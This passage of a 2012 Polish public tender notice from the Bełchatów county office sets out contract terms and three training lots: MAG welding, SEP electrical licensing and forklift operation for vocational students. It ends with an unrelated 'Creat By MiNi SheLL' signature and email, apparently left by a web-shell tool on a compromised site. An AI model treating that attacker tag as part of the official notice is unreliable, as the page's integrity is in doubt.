<p>Wszystkie  istotne dla stron postanowienia umowy wraz z wysokością kar umownych z tytułu niewykonania lub nienależytego wykonania umowy oraz ze szczegółowym zakresem obowiązków Wykonawcy związanych z realizacją przedmiotu zamówienia zawarte zostały we wzorach umów (Załącznik do 2 lub 3 lub 4 do SIWZ - istotne postanowienia  umów).
2. Wykonawca akceptuje treść wzoru umowy na wykonanie przedmiotu zamówienia stanowiący  załącznik  2 lub 3 lub 4  do niniejszej SIWZ, oświadczeniem zawartym w treści formularza ofertowego. Postanowienia umowy ustalone we wzorze nie podlegają zmianie przez Wykonawcę. Przyjęcie przez Wykonawcę postanowień wzoru umowy stanowi jeden  z warunków ważności oferty.
3. Zmiana Umowy po jej zawarciu jest dopuszczalna, o ile nie jest zmianą Umowy                          w stosunku do treści oferty złożonej przez Wykonawcę.
4. Wszelkie zmiany Umowy pod rygorem nieważności wymagają formy pisemnej. 
5. Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony w następujących  przypadkach:
1)Jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji umowy,
2)Jeżeli zajdzie konieczność zmiany okresu realizacji Projektu, stosownie do zmian harmonogramu rzeczowo - finansowego. Termin realizacji umowy ulega zmianie wraz ze zmianą okresu realizacji Projektu,
3)Jeżeli nastąpi zmiana dotycząca liczby uczestników biorących udział w szkoleniach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.e-bip.pl/Bełchatów Powiat Ziemski/Zamówienia Publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bełchatowie ul. Czapliniecka 96 pok. 4 Wydział Promocji i Rozwoju Powiatu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2012 godzina 10:00, miejsce: w sekretariacie - III piętro,
Starostwo Powiatowe w Bełchatowie ul. Pabianicka 17/19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Przeprowadzenie szkolenia dla 36 os. uprawnionych w zakresie spawania stali, blach i rur metodą MAG (135).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III.2.  ZADANIE 1.
Przedmiotem zamówienia jest przeprowadzenie szkolenia dla 36 pełnoletnich uczniów Zasadniczej Szkoły Zawodowej wchodzącej w skład ZSP nr 3 w Bełchatowie w zakresie spawania stali, blach i rur metodą MAG (135).
Kurs będzie realizowany w 3 edycjach:
Edycja I:
-Nabór 12 uczniów: I 2012
-Zajęcia: II-IV 2012
Edycja II:
-Nabór 12 uczniów: V 2012
-Zajęcia: VI-VIII 2012
Edycja III:
-Nabór 12 uczniów: IX 2012
-Zajęcia: X- do 15 XII 2012
Za przeprowadzenie naborów odpowiada Zamawiający.
Dla każdego z naborów:
- W ramach kursu realizowanych będzie 160 h zajęć praktyki i 40 h teorii prowadzonych zgodnie z programem Instytutu Spawalnictwa w Gliwicach. Program musi również odpowiadać aktualnym wymogom określonym w Rozporządzeniu Ministra Edukacji i Nauki w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i ponadto spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. Program szkolenia musi również wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez Ministra Pracy i Polityki Społecznej znajdujących się na stronie internetowej ministerstwa. 
Program szkolenia należy przygotować szczegółowo wg Załącznika nr 3 do formularza oferty. 

- Program zajęć obejmować winien następujące tematy:
1) BHP,
2) zastosowanie elektryczności do spawania łukowego,
3) urządzenia spawalnicze,
4) materiały dodatkowe do spawania,
5) oznaczenia i wymiarowanie spoin,
6) spawanie w praktyce,
7) przygotowywanie złączy,
8) kwalifikacje spawaczy, 
9) budowa i użytkowanie urządzeń do spawania MAG, 
10) charakterystyka spawania MAG,
11) wykorzystanie standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych w bazie danych prowadzonych przez Ministra.

Celem zajęć ma być teoretyczne i praktyczne przygotowanie uczestników do egz. końcowych IS P T-FW-1-135 wg wytycznych Instytutu Nr W-07 IS-17. Na zakończenie Wykonawca zorganizuje i będzie nadzorował egzamin zgodnie z procedurami Instytutu. Członkami Komisji muszą być osoby posiadające certyfikat Instytutu. Po zdaniu egzaminu Wykonawca wręczy każdemu uczniowi książeczkę spawacza oraz certyfikat zgodnie z wymaganiami PN-EN 287-1 ISO 9606 i wytycznymi JS W-07 I-17.

-W skład kosztu dotyczącego zlecenia usługi przeprowadzenia szkolenia z zakresu spawania wchodzić winny następujące elementy:
1) koszty opłacenia badań lekarskich,
2) koszty wynagrodzenia wykładowców posiadających niezbędne kwalifikacje i uprawnienia zgodne z programem szkolenia,
3) koszty egzaminów,
4) koszty wydania uprawnień i certyfikatów,
5) koszty ubrań roboczych dla BO,
6) koszty środków czystości dla BO,
7) koszty napojów typu woda mineralna dla BO,
8) koszty materiałów i narzędzi niezbędnych do realizacji zajęć,
9) koszty materiałów dydaktycznych: tablic, pism, filmów dydaktycznych, skryptów, testów zerowych itp.
10) koszt udostępnienia sal do wykładów i zajęć praktycznych,
11) koszt ubezpieczenia uczestników szkolenia,
12) koszty opiekuna grup.III.5. WYMAGANIA OGÓLNE DO ZADAŃ 1-3: 

III.5.1. Zajęcia muszą odbywać się od poniedziałku do piątku po lekcjach 3 h dydaktyczne dziennie (3 x 45 min + 2 przerwy 15 min). Zamawiający dopuszcza możliwość realizacji zajęć dydaktycznych również w sobotę. 
III.5.2. Każda grupa w każdym naborze winna mieć zagwarantowany nadzór wykładowcy bądź instruktora. Jeżeli zaistnieje konieczność podziału uczestników jednego naboru w ramach danego zadania, na mniejsze grupy, to każda grupa musi również mieć  zapewniony nadzór wykładowcy bądź instruktora.
III.5.3. Wykonawca zapewni nadzór wewnętrzny służący podnoszeniu jakości prowadzonych szkoleń, przez co należy rozumieć ustalenie opiekuna grupy, który jest do dyspozycji grupy w trakcie szkolenia i odpowiada za organizację i sprawny przebieg szkolenia.
III.5.4. Wykonawca zobowiązany będzie do monitorowania obecności uczniów na zajęciach i niezwłocznego informowania Zamawiającego o uczestnikach kursu, którzy przekroczyli 10% godzin nieobecności na zajęciach.
III.5.5. Uprawnienia wydane uczestnikom szkoleń winny być wystawione w języku polskim i angielskim.
III.5.6. Na zakończenie każdej edycji szkoleń uczniowie muszą  odwiedzić wybrane przez Wykonawcę przedsiębiorstwo zgodnie z kierunkiem szkolenia. Każda wizyta potrwać musi min. 2 h a jej celem będzie zobaczenie przykładowego miejsca pracy zgodnie z kierunkiem kursu oraz ćwiczenia praktyczne.
III.5.7. W przypadku, gdyby do projektu zgłosiły się uczennice, Wykonawca zobowiązany będzie do potraktowanie ich w trakcie zajęć w sposób indywidualny.  Zmuszony będzie do poświęcenia im dodatkowych 5 h na ćwiczeniach uzupełniających na każdym kursie. Za dodatkowe godziny zajęć nie będzie przysługiwało dodatkowe wynagrodzenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Przeprowadzenie szkolenia dla 36 os. uprawnionych w zakresie eksploatacji urządzeń, instalacji i sieci elektroenergetycznych do 1 kV E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III.3.  ZADANIE 2.
Przedmiotem zamówienia jest przeprowadzenie szkolenia dla 36 pełnoletnich uczniów Zasadniczej Szkoły Zawodowej wchodzącej w skład ZSP nr 3 w Bełchatowie w zakresie eksploatacji urządzeń, instalacji i sieci elektroenergetycznych do 1 kV E.

Kurs będzie realizowany w 3 edycjach:
Edycja I:
-Nabór 12 uczniów: I 2012
-Zajęcia: II-III 2012
Edycja II:
-Nabór 12 uczniów: V 2012
-Zajęcia: VI-VII 2012
Edycja III:
-Nabór 12 uczniów: IX 2012
-Zajęcia: X-XI 2012
Za przeprowadzenie naborów odpowiada Zamawiający.

Dla każdego z naborów:
-W ramach kursu zrealizowanych musi zostać 12 h zajęć praktycznych i 48 h teorii prowadzonych zgodnie z programem Stowarzyszenia Elektryków Polskich (SEP) i Wytycznymi Nr W-07 IS-17. Celem zajęć jest przygotowanie uczniów do egzaminów na uzyskanie świadectwa kwalifikacji w zakresie eksploatacji wybranych urządzeń, instalacji lub sieci elektroenergetycznych o napięciu do 1 kV. Na zakończenie Wykonawca zorganizuje i będzie nadzorował egzamin przeprowadzony zgodnie z procedurami Stowarzyszenia przed Komisją SEP w Piotrkowie Tryb. Po zdaniu egzaminu uczeń otrzyma uprawnienia zawodowe SEP do obsługi urządzeń elektrycznych do 1 kV.

-Program zajęć musi odpowiadać aktualnym wymogom określonym w Rozporządzeniu Ministra Edukacji i Nauki w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i ponadto spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. Program musi również wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez Ministra Pracy i Polityki Społecznej znajdujących się na stronie internetowej ministerstwa. 
Program należy przygotować szczegółowo wg Załącznika nr 3 do formularza oferty i obejmować musi on następujące zagadnienia:
1) definicje, określenia i parametry znamionowe urządzeń elektrycznych,
2) budowa, działanie i warunki techniczne obsługi urządzeń, instalacji i sieci elektroenergetycznych,
3) zasady eksploatacji oraz instrukcje eksploatacji urządzeń, instalacji i sieci elektroenergetycznych,
4) ogólne zasady racjonalnej gospodarki energetycznej,
5) prace kontrolno -pomiarowe i montażowe,
6) BHP oraz umiejętność udzielania pierwszej pomocy,
7) instrukcje postępowania w razie awarii, pożarów i innych zagrożeń,
8) warunki techniczne dotyczące metodyki wykonywania badań ochrony przeciwpożarowej, 9) ćwiczenia praktyczne.

-W skład kosztu dotyczącego zlecenia usługi przeprowadzenia szkolenia z zakresu uprawnień SEP wchodzić będą następujące elementy:
1) koszty wynagrodzenia wykładowców posiadających niezbędne kwalifikacje i uprawnienia zgodne z programem szkolenia,
2) koszty egzaminów,
3) koszty wydania uprawnień i certyfikatów,
4) koszty materiałów i narzędzi niezbędnych do realizacji zajęć,
5) koszty materiałów dydaktycznych: tablic, pism, filmów dyd. skryptów, testów zerowych itp.
6) koszt udostępnienia sal do wykładów i zajęć praktycznych,
7) koszt ubezpieczenia uczestników szkolenia,
8) koszty opiekuna grup.III.5. WYMAGANIA OGÓLNE DO ZADAŃ 1-3: 

III.5.1. Zajęcia muszą odbywać się od poniedziałku do piątku po lekcjach 3 h dydaktyczne dziennie (3 x 45 min + 2 przerwy 15 min). Zamawiający dopuszcza możliwość realizacji zajęć dydaktycznych również w sobotę. 
III.5.2. Każda grupa w każdym naborze winna mieć zagwarantowany nadzór wykładowcy bądź instruktora. Jeżeli zaistnieje konieczność podziału uczestników jednego naboru w ramach danego zadania, na mniejsze grupy, to każda grupa musi również mieć  zapewniony nadzór wykładowcy bądź instruktora.
III.5.3. Wykonawca zapewni nadzór wewnętrzny służący podnoszeniu jakości prowadzonych szkoleń, przez co należy rozumieć ustalenie opiekuna grupy, który jest do dyspozycji grupy w trakcie szkolenia i odpowiada za organizację i sprawny przebieg szkolenia.
III.5.4. Wykonawca zobowiązany będzie do monitorowania obecności uczniów na zajęciach i niezwłocznego informowania Zamawiającego o uczestnikach kursu, którzy przekroczyli 10% godzin nieobecności na zajęciach.
III.5.5. Uprawnienia wydane uczestnikom szkoleń winny być wystawione w języku polskim i angielskim.
III.5.6. Na zakończenie każdej edycji szkoleń uczniowie muszą  odwiedzić wybrane przez Wykonawcę przedsiębiorstwo zgodnie z kierunkiem szkolenia. Każda wizyta potrwać musi min. 2 h a jej celem będzie zobaczenie przykładowego miejsca pracy zgodnie z kierunkiem kursu oraz ćwiczenia praktyczne.
III.5.7. W przypadku, gdyby do projektu zgłosiły się uczennice, Wykonawca zobowiązany będzie do potraktowanie ich w trakcie zajęć w sposób indywidualny.  Zmuszony będzie do poświęcenia im dodatkowych 5 h na ćwiczeniach uzupełniających na każdym kursie. Za dodatkowe godziny zajęć nie będzie przysługiwało dodatkowe wynagrodzenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3: Przeprowadzenie szkolenia dla 36 os. uprawnionych w zakresie kierowców operatorów wózków jezdniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III.4.  ZADANIE 3.
Przedmiotem zamówienia jest przeprowadzenie szkolenia dla 36 pełnoletnich uczniów Zasadniczej Szkoły Zawodowej wchodzącej w skład ZSP nr 3 w Bełchatowie w zakresie kierowców operatorów wózków jezdniowych.

Kurs będzie realizowany w 3 edycjach:
Edycja I:
-Nabór 12 uczniów: I  2012
-Zajęcia: II-III 2012
Edycja II:
-Nabór 12 uczniów: V 2012
-Zajęcia: VI-VII 2012
Edycja III:
-Nabór 12 uczniów: IX 2012
-Zajęcia: X-XI 2012
Za przeprowadzenie naborów odpowiada Zamawiający.
Dla każdego z naborów:
-W ramach kursu zrealizowanych musi zostać 14 h zajęć praktycznych i 46 h teorii prowadzonych zgodnie z Dz. U. Nr 70 z 10 V 02 na podstawie programu ODK. Celem zajęć ma być praktyczne i teoretyczne przygotowanie do samodzielnego operowania wózkami jezdniowymi o napędzie elektrycznym. Na zakończenie Wykonawca zorganizuje i będzie nadzorował egzamin przeprowadzony przed Komisją Dozoru Technicznego. Uczestnik po pozytywnym zdaniu egzaminu otrzymać ma zaświadczenie kierowcy operatora wózków jezdniowych wg wzoru MEN.

-Program zajęć musi odpowiadać aktualnym wymogom określonym w Rozporządzeniu Ministra Edukacji i Nauki w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i ponadto spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. Program musi również wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez Ministra Pracy i Polityki Społecznej znajdujących się na stronie internetowej ministerstwa. 
Program należy przygotować szczegółowo wg Załącznika nr 3 do formularza oferty i obejmować musi on następujące zagadnienia:
1) typy wózków jezdniowych,
2) budowa wózków,
3) czynności kierowcy przy obsłudze wózka przed podjęciem pracy, w trakcie i po,
4) ładowność wózków,
5) ładunkoznawstwo,
6) przepisy BHP,
7) aparatura kontrolno-pomiarowa,
8) praktyczna nauka jazdy i manewrowanie wózkami,
9) dozór techniczny.

-W skład kosztu dotyczącego zlecenia usługi przeprowadzenia szkolenia z zakresu kierowania wózkami jezdniowymi wchodzić będą następujące elementy:
1) koszty wynagrodzenia wykładowców,
2) koszty egzaminów,
3) koszty wydania uprawnień i certyfikatów,
4) koszty materiałów i narzędzi niezbędnych do realizacji zajęć,
5) koszty materiałów dydaktycznych: tablic, pism, filmów dyd. skryptów, testów zerowych itp.,
6) koszt udostępnienia sal do wykładów i zajęć praktycznych,
7) koszt ubezpieczenia uczestników szkolenia,
8) koszty opiekuna grup.
III.5. WYMAGANIA OGÓLNE DO ZADAŃ 1-3: 

III.5.1. Zajęcia muszą odbywać się od poniedziałku do piątku po lekcjach 3 h dydaktyczne dziennie (3 x 45 min + 2 przerwy 15 min). Zamawiający dopuszcza możliwość realizacji zajęć dydaktycznych również w sobotę. 
III.5.2. Każda grupa w każdym naborze winna mieć zagwarantowany nadzór wykładowcy bądź instruktora. Jeżeli zaistnieje konieczność podziału uczestników jednego naboru w ramach danego zadania, na mniejsze grupy, to każda grupa musi również mieć  zapewniony nadzór wykładowcy bądź instruktora.
III.5.3. Wykonawca zapewni nadzór wewnętrzny służący podnoszeniu jakości prowadzonych szkoleń, przez co należy rozumieć ustalenie opiekuna grupy, który jest do dyspozycji grupy w trakcie szkolenia i odpowiada za organizację i sprawny przebieg szkolenia.
III.5.4. Wykonawca zobowiązany będzie do monitorowania obecności uczniów na zajęciach i niezwłocznego informowania Zamawiającego o uczestnikach kursu, którzy przekroczyli 10% godzin nieobecności na zajęciach.
III.5.5. Uprawnienia wydane uczestnikom szkoleń winny być wystawione w języku polskim i angielskim.
III.5.6. Na zakończenie każdej edycji szkoleń uczniowie muszą  odwiedzić wybrane przez Wykonawcę przedsiębiorstwo zgodnie z kierunkiem szkolenia. Każda wizyta potrwać musi min. 2 h a jej celem będzie zobaczenie przykładowego miejsca pracy zgodnie z kierunkiem kursu oraz ćwiczenia praktyczne.
III.5.7. W przypadku, gdyby do projektu zgłosiły się uczennice, Wykonawca zobowiązany będzie do potraktowanie ich w trakcie zajęć w sposób indywidualny.  Zmuszony będzie do poświęcenia im dodatkowych 5 h na ćwiczeniach uzupełniających na każdym kursie. Za dodatkowe godziny zajęć nie będzie przysługiwało dodatkowe wynagrodzenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com